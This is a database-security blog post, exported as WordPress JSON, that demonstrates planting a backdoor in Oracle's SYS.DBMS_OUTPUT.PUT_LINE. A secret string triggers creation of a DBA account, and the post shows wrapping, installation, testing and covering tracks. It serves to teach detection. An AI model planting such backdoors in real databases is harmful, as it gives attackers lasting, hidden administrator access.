{"id":3881,"date":"2018-12-05T08:50:14","date_gmt":"2018-12-05T10:50:14","guid":{"rendered":"https:\/\/www.dbarj.com.br\/?p=3881"},"modified":"2019-01-02T11:00:06","modified_gmt":"2019-01-02T13:00:06","slug":"injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects","status":"publish","type":"post","link":"https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/","title":{"rendered":"Injecting a simple dbakit (or rootkit) in Oracle PL\/SQL objects"},"content":{"rendered":"<p>In this article, I will show how extremely simple it is to inject a hidden rootkit inside an Oracle database PL\/SQL object (like a procedure), making it very hard to detect for almost all DBAs and security admins. It&#8217;s important to understand how these viruses work so that we can always be prepared to combat them.\u00a0<span style=\"color: #000080;\"><strong>Later, in another article, I will also show how to detect and eliminate this type of\u00a0threat.<\/strong><\/span><\/p>\n<p><a href=\"https:\/\/www.dbarj.com.br\/en\/orachksum-oracle-database-integrity-checker\/\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #800000;\"><strong>UPDATE: Article about orachksum tool is ready.<\/strong><\/span><\/a><\/p>\n<p>Viruses, malware and rootkits are simply pieces of code written with evil intent. As they are program instructions, they can run anywhere that accepts code, and when we are talking about Oracle Database, the first thing that comes to mind is <strong>PL\/SQL objects<\/strong>.<\/p>\n<p>A rootkit is simply a &#8220;kit&#8221; to become &#8220;root&#8221;.\u00a0 In the Oracle DB world, that would be a hidden kit to become &#8220;sys&#8221;, as this is the highest privilege within Oracle DB. 
A more appropriate name here would be &#8220;<strong>syskit<\/strong>&#8221; or &#8220;<strong>dbakit<\/strong>&#8221;.<\/p>\n<p>So, if you&#8217;ve ever given DBA access to someone other than yourself, there is a chance that a <em><strong>dbakit<\/strong><\/em> or some other malicious code is in your Oracle database. It could be an upset ex-employee, a temporary service provider who needed this privilege for a very short time, the mad developer who asked for DBA access to build his application (and you granted it!) or even a hacker who exploited some flaw and left an open door behind so he could come back one day.<\/p>\n<p><span style=\"color: #ff0000;\">In other words, to inject the rootkit, the attacker must have had SYS privileges at some point in time. However, to use and exploit it, he only needs CREATE SESSION, meaning that even if the current database administrator removes the privileged roles from him, he can still become DBA.<\/span><\/p>\n<p>So, thinking like a hacker, to deploy a PL\/SQL-level <strong><em>dbakit<\/em><\/strong>, he will follow 3 principles:<\/p>\n<ol>\n<li><strong>Inject into an object that is accessible to everyone.<\/strong><\/li>\n<li><strong>Inject into an object that is owned by some powerful user.<\/strong><\/li>\n<li><strong>Make it hard to detect.<\/strong><\/li>\n<\/ol>\n<h3>Let&#8217;s start.<\/h3>\n<p>First, the environment I&#8217;m playing with here: 12.2.0.1 &#8211; Oct 2018 PSU\/OJVM &#8211; Container Database &#8211; Oracle Linux 6.8<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\">[oracle@localhost ~]$ sqlplus \/ as sysdba\r\n\r\nSQL*Plus: Release 12.2.0.1.0 Production on Tue Dec 4 11:21:06 2018\r\n\r\nCopyright (c) 1982, 2016, Oracle.  
All rights reserved.\r\n\r\n\r\nConnected to:\r\nOracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production\r\n\r\nSQL&gt; show pdbs\r\n\r\n    CON_ID CON_NAME                       OPEN MODE  RESTRICTED\r\n---------- ------------------------------ ---------- ----------\r\n         2 PDB$SEED                       READ ONLY  NO\r\n         3 PDB01                          READ WRITE NO<\/pre>\n<p>Rule 1 basically means that the attacker will try to find an object on which <strong>EXECUTE<\/strong> is granted to <strong>PUBLIC<\/strong>, while rule 2 means that this object needs to be owned by some powerful account, like a DBA or SYS.<\/p>\n<p>We can get a list of some of those objects with the query:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"oracledb\">SQL&gt; set lines 30 pages 100\r\nSQL&gt; select distinct t1.object_name\r\n  2  from   dba_procedures t1, dba_tab_privs t2\r\n  3  where  t1.owner='SYS'\r\n  4  and    t1.authid='DEFINER'\r\n  5  and    t1.owner = t2.owner\r\n  6  and    t1.object_name = t2.table_name\r\n  7  and    t2.grantee='PUBLIC'\r\n  8  and    t2.privilege='EXECUTE'\r\n  9  and    t1.object_name like 'DBMS\\_%' escape '\\'\r\n 10  order by 1;\r\n\r\nOBJECT_NAME\r\n-----------------------------\r\nDBMS_APPLICATION_INFO\r\nDBMS_APP_CONT_PRVT\r\nDBMS_AUTO_TASK\r\nDBMS_CDC_ISUBSCRIBE\r\nDBMS_CDC_SUBSCRIBE\r\nDBMS_CRYPTO_TOOLKIT\r\nDBMS_CUBE_ADVISE_SEC\r\nDBMS_DEBUG\r\nDBMS_DESCRIBE\r\nDBMS_LDAP_UTL\r\nDBMS_LOB\r\nDBMS_LOBUTIL\r\nDBMS_LOGSTDBY_CONTEXT\r\nDBMS_NETWORK_ACL_UTILITY\r\nDBMS_OBFUSCATION_TOOLKIT\r\nDBMS_OUTPUT\r\nDBMS_PICKLER\r\nDBMS_RANDOM\r\nDBMS_RESULT_CACHE_API\r\nDBMS_ROWID\r\nDBMS_SNAPSHOT_UTL\r\nDBMS_STANDARD\r\nDBMS_TF\r\nDBMS_TRACE\r\nDBMS_UTILITY\r\nDBMS_XA_XID\r\nDBMS_XS_NSATTR\r\n\r\n27 rows selected.\r\n\r\nSQL&gt;<\/pre>\n<p>So, all the packages above are owned by SYS, and anyone with only CREATE SESSION can run them. They also execute with the privileges of SYS, not those of the connected user. 
Let&#8217;s use\u00a0<strong>DBMS_OUTPUT<\/strong>, a very common one, for this exercise.<\/p>\n<p>Getting its code&#8230;<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"oracledb\">SQL&gt; set pages 0\r\nSQL&gt; set long 100000\r\nSQL&gt; select dbms_metadata.get_ddl('PACKAGE_BODY','DBMS_OUTPUT') from dual;\r\n\r\n  CREATE OR REPLACE NONEDITIONABLE PACKAGE BODY \"SYS\".\"DBMS_OUTPUT\" wrapped\r\na000000\r\n1\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nb\r\n10c4 5d8\r\nxj45EHIG5cl1aAF9cvrQRI+6G3Ewg0MreSAF3y8ZF7UY+Mm9LZmxHaeowB1QMzHz2Gk5oQ0I\r\nvATni377JegRt8sdkoa\/z5RsDNy6fk9gNi2iGdnHv3KQUwFtsrrvR9lDyz+dELVCtc7k0gg6\r\nvXV2UOFn\/4tE0a9kQpNvhVOq7TAd1StaR1r1hzszZbWy1hH\/WLTNx+K48OYMjq2A8cXIv6ER\r\nC7d0Wki6Js9CHVB5odntPIs8zvG0d\/SzGT\/Vlw1nPoTn9eKiAQ4KVW+oo23VGzNZ54VsFpCm\r\nFuqlp73tJC4\/QUG1wEHm\/5wwHU5MgA6OFPUxxxdE4ne9dwsY\/9EVNN0BbC\/fE\/2OdLZlpjRF\r\nSN6zuX2j4h2ic7w1aFEvY8gYGHZRhwYYXALCAQyCwK88sXSgqC3gmUaRf5sZfVesylTRUnJh\r\nBWYPfI2czyBHtQXIOb52R1KQxyWlzLc688gq5jx8Nab3lvjIAezdO517dtl+Wk0c1Y6nvq1b\r\nD1soJ3tr6ZWne1kWhTvlFKIN6NfALfom6eDhU6b8ORi0YPHV41X\/Xx9p6hEyUYclFOiCCkAC\r\nft6HFR70kxCXuVOuT87XClF96xsbrKETs5XL9IV1TjWBheozMV5Vl0So039jJvYtR2M+QPrA\r\nF7loiQjJD2ItZwKTfWbHL3KyJBRfMOCuCe3adoPNM1TjnvV0yNKhV+p5RvOJBK9t\/4yhEegZ\r\nJvUy5rJexLb2FeaaRPzybEePzXUrqHbgB3JC2+eDee\/j3KgUScfaQeEzmdM6G2jkefdQhqNM\r\n17anSnDxyQ2cFFKsF8ysCWa+E1OyZM2OM2OjZLyzKt9VAKw4PuV\/DZfSsZkwU7W4qQdqByRB\r\n+UbGlgeuvyjQqvc2z3N7TVuSpe75c3O2ehmTEbj4\/uvugs96z2X8atIWlDJfaxLJnHcP3xau\r\ncJaGJbgpPrOec5jme52pBcGY2qw8\/S6CZhDn5Wj2kjagJhl2g1cepezNP0c4TlefQ7v6oQp+\r\nCNW+kYcKk7l9zVZ1INdPudE87MbNCAmZdUGeOMfPF4qRliPS8ZqLQ4D9O5ioJ31IFL6wgiQT\r\nI7DrJuMhZ7eEtiuTJsiX81PQjBn1hmPV7TTDTK\/aQyP108bMXKx4f5Ur3BTZc9LLOuhUd0HM\r\nb5bee\/vvndGAZ1CjkLT7Rb2YTBqr6k7as+e7VVyHDpxYOkWUAb7w8s0TlRhESDynVV7DuavN\r\nGpaVg6HffXQ7b80XAiE6A45QGg7au1oPy83RTGRKvjiMk6VLLL6JPxszz9gjTY52QRh3sdsb\r\nBQt17SYNjEZ4VCDWFN6SP\/rO+GwqhORnJIc3yn8iuzDkO3
Sbnvfi0VIFrgN1SQA\/IDicTvah\r\nnT\/s8sVlBYGcWIpzWmu90qpxc6n6459gjRqBEC5AE4emjwDXR+m4zCuOcV\/baDBuaTy8YMex\r\nrytkKIPVNMygE6Wg0OK1ukGDtSRzHbVrxqo=\r\n\r\n\r\nSQL&gt;<\/pre>\n<p>The code is obfuscated, but it&#8217;s not hard to use one of the <a href=\"https:\/\/www.codecrete.net\/UnwrapIt\/\" target=\"_blank\" rel=\"noopener\">online options<\/a> to undo that.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">PACKAGE BODY dbms_output AS\r\n\r\n  ENABLED         BOOLEAN        := FALSE;\r\n  BUF_SIZE        BINARY_INTEGER;\r\n  LINEBUFLEN      BINARY_INTEGER := 0;\r\n  PUTIDX          BINARY_INTEGER := 1;\r\n  GETIDX          BINARY_INTEGER := 2;\r\n  GET_IN_PROGRESS BOOLEAN := TRUE;\r\n  TYPE            CHAR_ARR IS TABLE OF VARCHAR2(32767) INDEX BY BINARY_INTEGER;\r\n  BUF             CHAR_ARR;\r\n  BUFLEFT         BINARY_INTEGER := -1;\r\n\r\nPROCEDURE KKXERAE(\r\n   NUM BINARY_INTEGER\r\n  ,MSG VARCHAR2\r\n  ,KEEPERRORSTACK BOOLEAN DEFAULT FALSE);\r\nPRAGMA INTERFACE (C, KKXERAE);\r\n\r\nPROCEDURE RAISE_APPLICATION_ERROR(\r\n   NUM BINARY_INTEGER\r\n  ,MSG VARCHAR2\r\n  ,KEEPERRORSTACK BOOLEAN DEFAULT FALSE)\r\nIS\r\nBEGIN\r\n  KKXERAE(NUM, MSG, KEEPERRORSTACK);\r\nEND RAISE_APPLICATION_ERROR;\r\n\r\n  PROCEDURE ENABLE (BUFFER_SIZE IN INTEGER DEFAULT 20000) IS\r\n    LSTATUS INTEGER;\r\n    LOCKID  INTEGER;\r\n  BEGIN\r\n    ENABLED := TRUE;\r\n    IF BUFFER_SIZE &lt; 2000 THEN\r\n      BUF_SIZE := 2000;\r\n    ELSIF BUFFER_SIZE &gt; 1000000 THEN\r\n      BUF_SIZE := 1000000;\r\n    ELSIF BUFFER_SIZE IS NULL THEN\r\n      BUF_SIZE := -1;\r\n    ELSE\r\n      BUF_SIZE := BUFFER_SIZE;\r\n    END IF;\r\n    BUFLEFT := BUF_SIZE;\r\n  END;\r\n\r\n  PROCEDURE DISABLE IS\r\n  BEGIN\r\n    ENABLED := FALSE;\r\n\r\n    BUF.DELETE;\r\n    PUTIDX      := 1;\r\n    BUF(PUTIDX) := '';\r\n    GET_IN_PROGRESS := TRUE;\r\n  END;\r\n\r\n  PROCEDURE PUT_INIT IS\r\n  BEGIN\r\n    BUF.DELETE;\r\n    PUTIDX := 1;\r\n    BUF(PUTIDX) := '';\r\n    LINEBUFLEN := 0;\r\n    BUFLEFT := BUF_SIZE;\r\n    GET_IN_PROGRESS := FALSE;\r\n  END;\r\n\r\n  PROCEDURE PUT(A VARCHAR2) IS\r\n    STRLEN  BINARY_INTEGER;\r\n  BEGIN\r\n    IF ENABLED THEN\r\n      IF GET_IN_PROGRESS THEN\r\n        PUT_INIT;\r\n      END IF;\r\n\r\n      STRLEN := NVL(LENGTHB(A), 0);\r\n      IF ((STRLEN + LINEBUFLEN) &gt; 32767) THEN\r\n        LINEBUFLEN := 0; BUF(PUTIDX) := '';\r\n        RAISE_APPLICATION_ERROR(-20000, 'ORU-10028: line length overflow, ' ||\r\n          'limit of 32767 bytes per line');\r\n      END IF;\r\n\r\n      IF (BUF_SIZE &lt;&gt; -1) THEN\r\n        IF (STRLEN &gt; BUFLEFT) THEN\r\n            RAISE_APPLICATION_ERROR(-20000, 'ORU-10027: buffer overflow, ' ||\r\n              'limit of ' || TO_CHAR(BUF_SIZE) || ' bytes');\r\n        END IF;\r\n        BUFLEFT := BUFLEFT - STRLEN;\r\n      END IF;\r\n\r\n      BUF(PUTIDX) := BUF(PUTIDX) || A;\r\n      LINEBUFLEN := LINEBUFLEN + STRLEN;\r\n\r\n    END IF;\r\n  END;\r\n\r\n  PROCEDURE PUT_LINE(A VARCHAR2) IS\r\n  BEGIN\r\n    IF ENABLED THEN\r\n      PUT(A);\r\n      NEW_LINE;\r\n    END IF;\r\n  END;\r\n\r\n  PROCEDURE NEW_LINE IS\r\n  BEGIN\r\n    IF ENABLED THEN\r\n      IF GET_IN_PROGRESS THEN\r\n        PUT_INIT;\r\n      END IF;\r\n      LINEBUFLEN := 0;\r\n      PUTIDX := PUTIDX + 1;\r\n      BUF(PUTIDX) := '';\r\n    END IF;\r\n  END;\r\n\r\n  PROCEDURE GET_LINE(LINE OUT VARCHAR2, STATUS OUT INTEGER) IS\r\n  BEGIN\r\n    IF NOT ENABLED THEN\r\n      STATUS := 1;\r\n      RETURN;\r\n    END IF;\r\n\r\n    IF NOT GET_IN_PROGRESS THEN\r\n\r\n      GET_IN_PROGRESS := TRUE;\r\n\r\n      IF (LINEBUFLEN &gt; 0) AND (PUTIDX = 1) THEN\r\n        STATUS := 1;\r\n        RETURN;\r\n      END IF;\r\n\r\n      GETIDX := 1;\r\n    END IF;\r\n\r\n    WHILE GETIDX &lt; PUTIDX LOOP\r\n      LINE := BUF(GETIDX);\r\n      GETIDX := GETIDX + 1;\r\n      STATUS := 0;\r\n      RETURN;\r\n    END LOOP;\r\n    STATUS := 1;\r\n    RETURN;\r\n  END;\r\n\r\n  PROCEDURE GET_LINES(LINES OUT CHARARR, NUMLINES IN OUT INTEGER) IS\r\n    LINECNT INTEGER := 1;\r\n    S       INTEGER;\r\n  BEGIN\r\n    IF NOT ENABLED THEN\r\n      NUMLINES := 0;\r\n      RETURN;\r\n    END IF;\r\n    WHILE LINECNT &lt;= NUMLINES LOOP\r\n      GET_LINE(LINES(LINECNT), S);\r\n      IF S = 1 THEN\r\n        NUMLINES := LINECNT - 1;\r\n        RETURN;\r\n      END IF;\r\n      LINECNT := LINECNT + 1;\r\n    END LOOP;\r\n    NUMLINES := LINECNT - 1;\r\n    RETURN;\r\n  END;\r\n\r\n  PROCEDURE GET_LINES(LINES OUT DBMSOUTPUT_LINESARRAY, NUMLINES IN OUT INTEGER)\r\n  IS\r\n    LINECNT INTEGER := 1;\r\n    S       INTEGER;\r\n    N       INTEGER;\r\n  BEGIN\r\n    IF NOT ENABLED THEN\r\n      NUMLINES := 0;\r\n      RETURN;\r\n    END IF;\r\n\r\n    LINES := DBMSOUTPUT_LINESARRAY();\r\n    LINES.DELETE;\r\n\r\n    IF NUMLINES &lt; BUF.COUNT THEN\r\n      N := NUMLINES;\r\n    ELSE\r\n      N := BUF.COUNT;\r\n    END IF;\r\n\r\n    LINES.EXTEND(N);\r\n    WHILE LINECNT &lt;= N LOOP\r\n      GET_LINE(LINES(LINECNT), S);\r\n      IF S = 1 THEN\r\n        NUMLINES := LINECNT - 1;\r\n        RETURN;\r\n      END IF;\r\n      LINECNT := LINECNT + 1;\r\n    END LOOP;\r\n    NUMLINES := LINECNT - 1;\r\n    RETURN;\r\n  END;\r\n\r\nEND;<\/pre>\n<p>Now that the code is readable, an attacker could inject the <em><strong>dbakit<\/strong><\/em> into it. Let&#8217;s say he changes the\u00a0<strong>PUT_LINE<\/strong> procedure, one of the most commonly used ones, and adds something like this:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"oracledb\">  PROCEDURE PUT_LINE(A VARCHAR2) IS\r\n  BEGIN\r\n    IF ENABLED THEN\r\n      IF (a = 'shh! keep it secret!')\r\n      THEN\r\n        BEGIN\r\n          NEW_LINE;\r\n          execute immediate 'create user c##rj identified by oracle';\r\n          PUT('User c##rj created.');\r\n          NEW_LINE;\r\n        EXCEPTION WHEN OTHERS THEN NULL;\r\n        END;\r\n        BEGIN\r\n          NEW_LINE;\r\n          execute immediate 'grant dba to c##rj';\r\n          PUT('User c##rj granted DBA.');\r\n          NEW_LINE;\r\n        EXCEPTION WHEN OTHERS THEN NULL;\r\n        END;\r\n      END IF;\r\n      PUT(A);\r\n      NEW_LINE;\r\n    END IF;\r\n  END;<\/pre>\n<p>The code above checks whether someone is trying to print the exact sentence &#8220;<strong>shh! keep it secret!<\/strong>&#8221; and, if so, creates a CDB account named <strong>c##rj<\/strong> and grants DBA to it. 
Of course, the attacker doesn&#8217;t want any error printed on screen if it fails, so an EXCEPTION block is there to deal with it.<\/p>\n<p>The <em><strong>dbakit<\/strong><\/em> is ready. The next step is to inject it back into the database, but he will probably wrap it again first:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\">[oracle@localhost ~]$ wrap iname=dbms_output_mod.sql \r\n\r\nPL\/SQL Wrapper: Release 12.2.0.1.0- 64bit Production on Tue Dec 04 13:28:57 2018\r\n\r\nCopyright (c) 1993, 2009, Oracle.  All rights reserved.\r\n\r\nProcessing dbms_output_mod.sql to dbms_output_mod.plb\r\n[oracle@localhost ~]$ cat dbms_output_mod.plb\r\nCREATE PACKAGE BODY \"SYS\".\"DBMS_OUTPUT\" wrapped \r\na000000\r\n1\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nb\r\n12a3 6a7\r\n9KQrttwzNgyjF4mRkR5nhXBDf1cwg0NUea4FWi+8cuQY3vioYefjwCVSFY7eC66sAguA9phG\r\n+NMI4PK5V03mg+uhcwh4+PwNC7Cgv3P1b+EXv4dBWELJn2pfAsF+rHyXUQwwpPDoOmbVbZOT\r\nNDmnu1AdqT79bAQ3QmCTp8oM18aGv3zJoUr79EqXCGbQqoTVq7BfD9EGoN29wKj32z7xw6ze\r\nnEZ8ny+m+vOsV+wd9brTwCACvr0\/LoppbbOD4NQDvcZ6xKhQP68Mve1TbqhXrjDUzqxSy1LL\r\nAlqmkQswclNUJNI\/InqSQ4UHV\/C4y4zZSmc+Wn3CsP7Tdh+6abvM9fyoR6hgbIBXJE\/vF333\r\n+1rZ3gxtKwfrz+CoGHLB44JdeoZCNQFhzIBXyQEJTcI6+75wtz4dOOPQk+OPAoSG8GGk526V\r\nrdG0fqfbqNUGVkxaTrUqGpBXmojuFNyhaqIuiwdnPOeTajb72yH8hG\/n4cQ\/\/LiOA6+MI1\/3\r\n1YvUPnV7BGkHW9JpLcfzGxRdYRbHuCcubZMwHF5tUzZQ+3eyXUvwFMaPRQD3hw5XhGOG0vHK\r\nf80+Klmbp4s+NADIrk\/CGbnrST+wAfHS3ra2Negu\/OAHRgtZ+A4j2wuBSE3iXdgv9IUldw3j\r\nBnFvhMm+gr8jlwQD+PMbVHBwmFpIU8dqdL0+uSakD9jLOSe+AG9u4XnhFBDTSm3f5lsYbY8K\r\n\/5ChFrAZYfUy5g1exLYKxn6ak\/yLRJzWxAujMbjjpBvBy+8RDfDdMUQTbmdkBJ5NttsILlPr\r\n\/vSAZLcGfl1\/qudbP2kSCHpiUx4UhUnxHvQFpYPcOA\/llet4RTORvyg4yAjA0KNDpbELMFQi\r\nK6VpAD9UmmrrwScy\/qXSH6HdnJbagWcsela1ceLuKdw11h6dsT2Cz9grCRCPIBpRSrOfcvo+\r\ngZyely+0hX0hbqvyoOa16MhKSu6S61WkNR7w6Ij3tEZmuueSVKC8VHZNVx6l7M28+jg6RbDZ\r\nmre3KzFo0F3xiDvJvpCumDzP9vn1v
y1QaH7QH6CmPvMmQbu7D68sXIHzFpNyPdflo52rzqPl\r\nzBqDGiMJNMj\/HReywQSnRNftKY6MdbMFqVaHO9XO0llEmEJOyYHaViAKxoGbSJNVCZLu3jIy\r\nTmmycdVR7lsBOw5ZaLmYMvyb0E4vF6x7uKhXdfPP4qO6HJ7wZlu13+IoCgrGKmiHD6+Soe5o\r\nq9aOsOOM8\/ioUiFC1YDogSXSS\/BpYJuVFJLirYMAuyd9ktuzIJiLfSkAz2HpFKaXb\/c4s8T7\r\nBT6EUL8sLU2u0OK5oQNR1TA7cU9fIRVLFkKD212jMfFWc7D+dCAYrS6KkQiJyyxwXerB44P4\r\nefZQn6lIFUgfJtQ9NDkhFZhXbbYhZUnoSKGn124JE5NN21Z49tmS1z6\/8DMOlpUVoUvriKNi\r\ng3IYcYuuzGfIrLwldJVVDzslzUK3\/cXsfA0eStlodkIAv\/ccxZMHBWYqKsz63wTcGT2D3BX9\r\n2Oo18SFMrsD+I\/GZQHVOI04tNlIIiMYSlgHIzLj16fQFP+yVaPwIupnV+SgO+bIOYU2FisKd\r\nR5G7Ep4uDqq4gWIbPoOIjcGxsQhoh11ipoYpohlOatgaj3EUm+YKAqwzxBrDv0slHtZh0E6s\r\nK+13u4wetaewBv6utaZbX9\/C\r\n\r\n\/\r\n[oracle@localhost ~]$<\/pre>\n<p>Changing the first line to <span style=\"font-size: 10pt;\"><strong><span style=\"color: #0000ff;\">CREATE OR REPLACE NONEDITIONABLE PACKAGE BODY &#8220;SYS&#8221;.&#8221;DBMS_OUTPUT&#8221; wrapped<\/span><\/strong><\/span><br \/>\nand injecting it back to the database:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"oracledb\">SQL&gt; @dbms_output_mod.plb\r\n\r\nPackage body created.\r\n\r\nSQL&gt; show errors\r\nNo errors.\r\nSQL&gt;<\/pre>\n<p>And now testing the <em><strong>dbakit<\/strong><\/em>:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"oracledb\">SQL&gt; select username from dba_users where username='C##RJ';\r\n\r\nno rows selected\r\n\r\nSQL&gt; set serverout on\r\nSQL&gt; exec dbms_output.enable;\r\n\r\nPL\/SQL procedure successfully completed.\r\n\r\nSQL&gt; exec dbms_output.put_line('Hello');\r\nHello\r\n\r\nPL\/SQL procedure successfully completed.\r\n\r\nSQL&gt; exec dbms_output.put_line('Bye');\r\nBye\r\n\r\nPL\/SQL procedure successfully completed.\r\n\r\nSQL&gt; exec dbms_output.put_line('shh! keep it secret!');\r\nUser c##rj created.\r\nUser c##rj granted DBA.\r\nshh! 
keep it secret!\r\n\r\nPL\/SQL procedure successfully completed.\r\n\r\nSQL&gt; select username from dba_users where username='C##RJ';\r\n\r\nUSERNAME\r\n--------------------------------------------------------------------------------\r\nC##RJ\r\n\r\nSQL&gt; conn c##rj\/oracle\r\nConnected.<\/pre>\n<p>The <em><strong>dbakit<\/strong><\/em> works. Now the only thing a user who has only the CREATE SESSION privilege needs to do to get DBA access is execute:\u00a0<em><strong>exec dbms_output.put_line('shh! keep it secret!');<\/strong><\/em><\/p>\n<p>Just to make it harder to detect, the attacker will probably revert the modification timestamp of the package body change in obj$, clean the audit logs and apply some other tricks to cover his tracks.<\/p>\n<p><strong>In the next article I will talk about the <span style=\"color: #ff0000;\">orachksum<\/span> utility and how to use it to detect any modified Oracle code inside your database.<\/strong><\/p>\n<p><a href=\"https:\/\/www.dbarj.com.br\/en\/orachksum-oracle-database-integrity-checker\/\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #800000;\"><strong>UPDATE: Article about orachksum tool is ready.<\/strong><\/span><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this article, I will show how extremely simple it is to inject a hidden rootkit inside an Oracle database PL\/SQL object (like a procedure), making it very hard to detect for almost all DBAs and security admins. It&#8217;s important to understand how these viruses work so that we can always be prepared to &hellip; <\/p>\n","protected":false},"author":1,"featured_media":3899,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20],"tags":[],"class_list":["post-3881","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security-en","item-wrap"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Injecting a simple dbakit (or rootkit) in Oracle PL\/SQL objects - DBA - Rodrigo Jorge - Oracle Tips and Guides<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/\" \/>\n<meta 
name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"DBA RJ\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/\"},\"author\":{\"name\":\"DBA RJ\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/#\\\/schema\\\/person\\\/28a44ca3a6633fe4156ad1ea209d40a9\"},\"headline\":\"Injecting a simple dbakit (or rootkit) in Oracle PL\\\/SQL objects\",\"datePublished\":\"2018-12-05T10:50:14+00:00\",\"dateModified\":\"2019-01-02T13:00:06+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/\"},\"wordCount\":742,\"commentCount\":2,\"publisher\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/#\\\/schema\\\/person\\\/28a44ca3a6633fe4156ad1ea209d40a9\"},\"image\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2018\\\/12\\\/seguranca_hacker_ciber.jpg\",\"articleSection\":[\"Database 
Security\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/\",\"url\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/\",\"name\":\"Injecting a simple dbakit (or rootkit) in Oracle PL\\\/SQL objects - DBA - Rodrigo Jorge - Oracle Tips and Guides\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2018\\\/12\\\/seguranca_hacker_ciber.jpg\",\"datePublished\":\"2018-12-05T10:50:14+00:00\",\"dateModified\":\"2019-01-02T13:00:06+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2018\\\/12\\\/seguranca_hacker_ciber.jpg\",\"contentUrl\":\"https:\\\/\\\
